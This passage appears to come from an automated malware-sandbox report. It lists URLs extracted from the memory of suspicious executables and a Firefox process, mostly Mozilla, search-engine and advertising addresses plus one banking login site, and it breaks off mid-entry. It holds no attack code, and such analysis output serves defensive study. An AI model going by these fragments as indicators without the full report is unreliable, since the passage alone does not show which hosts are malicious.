Source: firefox.exe, 00000024.00000003.2476830924.000001DF271B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2956116951.000001DF20629000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: file.exe, 00000000.00000003.1342792101.0000000005737000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2300912245.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2329858713.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2309734224.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2301246829.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2503189441.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2357249097.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2325565887.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2538505207.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2473488619.00000000013AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: file.exe, 00000000.00000003.1342792101.0000000005737000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2473488619.00000000013AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: firefox.exe, 00000024.00000002.2953297308.000001DF20284000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2935278544.000001DF1EDA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2953297308.000001DF2024D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2962029495.000001DF20C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1170143
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678942
Source: firefox.exe, 00000024.00000002.2864945025.000001DF1AB65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1817617
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=793869
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=806991
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=815437
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=840161
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=951422
Source: file.exe, 00000000.00000003.1315402793.0000000005769000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257274069.0000000005747000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257442357.0000000005744000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2403239780.0000000005C08000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2402973895.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1315402793.0000000005769000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257274069.0000000005747000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257442357.0000000005744000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2403239780.0000000005C08000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2402973895.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1315402793.0000000005769000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257274069.0000000005747000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257442357.0000000005744000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2403239780.0000000005C08000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2402973895.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000024.00000003.2405355809.000001DF1EB40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2405966297.000001DF1EB7F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000024.00000002.2911908216.000001DF1B024000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: file.exe, 00000000.00000003.1342792101.0000000005737000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2473488619.00000000013AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000003.1342792101.0000000005737000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2300912245.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2329858713.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2309734224.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2301246829.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2503189441.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2357249097.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2325565887.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2538505207.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2473488619.00000000013AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000024.00000002.2971880123.000001DF22267000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000024.00000002.2961278274.000001DF20B55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 00000024.00000002.2961278274.000001DF20B55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000024.00000002.2961278274.000001DF20B55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 00000024.00000002.2961278274.000001DF20B55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 00000024.00000002.2961278274.000001DF20B55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: 76bf5a4dba.exe, 00000014.00000003.2307921520.0000000004D7B000.00000004.00001000.00020000.00000000.sdmp, 76bf5a4dba.exe, 00000014.00000002.2348423588.000000000034C000.00000040.00000001.01000000.0000000F.sdmp String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: firefox.exe, 00000024.00000003.2405355809.000001DF1EB40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2945767195.000001DF1FD4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2924896477.000001DF1C617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2512690491.000000117E300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2405966297.000001DF1EB7F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.1315402793.0000000005769000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257274069.0000000005747000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257442357.0000000005744000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2403239780.0000000005C08000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2402973895.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1315402793.0000000005769000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257274069.0000000005747000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257442357.0000000005744000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2403239780.0000000005C08000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2402973895.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1315402793.0000000005769000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257274069.0000000005747000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257442357.0000000005744000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2403239780.0000000005C08000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2402973895.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2494215088.000001DF20967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000024.00000002.2961278274.000001DF20B55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 00000024.00000002.2938873150.000001DF1F2B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000024.00000002.2961278274.000001DF20B55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000024.00000002.2911908216.000001DF1B024000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000024.00000002.2956116951.000001DF206F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com
Source: firefox.exe, 00000024.00000002.2956116951.000001DF20608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/
Source: firefox.exe, 00000024.00000002.2956116951.000001DF20603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000024.00000002.2968441322.000001DF216F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000024.00000002.2968441322.000001DF216F4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabControl
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morechrome://global/skin/icons/pocket.svg
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morehome-prefs-recent-activity-header
Source: firefox.exe, 00000024.00000002.2968441322.000001DF216F4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsDisplays
Source: firefox.exe, 00000024.00000003.2405355809.000001DF1EB40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotshandleTopSitesOrganicImpressionStatshandleDiscoverySt
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/uuidjs/uuid#getrandomvalues-not-supported
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000024.00000002.2911908216.000001DF1B024000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/devtools-compatibility-panel
Source: firefox.exe, 00000024.00000002.2956116951.000001DF20629000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000024.00000002.2926560740.000001DF1C8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2944704309.000001DF1FC37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2935722606.000001DF1EEEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/oldsync
Source: firefox.exe, 00000024.00000002.2956116951.000001DF206A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/oldsyncS
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2949252169.000001DF1FFC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/relay
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/cmd/
Source: firefox.exe, 00000024.00000002.2956116951.000001DF206A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/cmd/H
Source: firefox.exe, 00000024.00000002.2956116951.000001DF206A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/cmd/HCX
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetry
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetryEncountered
Source: firefox.exe, 00000024.00000002.2956116951.000001DF206A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetryU
Source: firefox.exe, 00000024.00000002.2956116951.000001DF206A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetryUFj
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: 100bc97ff1.exe, 00000013.00000003.2300912245.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2329858713.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2309734224.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2301246829.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2503189441.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2357249097.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2325565887.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2538505207.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pq
Source: 100bc97ff1.exe, 00000015.00000003.2473488619.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2964896342.000001DF2107E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submitsection.highlights.includeDownloadsAllows
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema
Source: firefox.exe, 00000024.00000002.2939626250.000001DF1F438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000024.00000002.2942538324.000001DF1F963000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource://activity-stream/lib/RecommendationProvi
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mochitest.youtube.com/
Source: file.exe, 00000000.00000003.1340877623.000000000572E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1340970674.0000000005737000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2357604902.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2357249097.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2538505207.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2306562309.0000000000DF8000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2308035075.0000000000E04000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2325565887.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2283284801.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2285683190.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2300912245.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2309734224.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2300426734.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2325695916.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2306687655.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2306628908.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2502216813.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2534728994.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2329858713.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 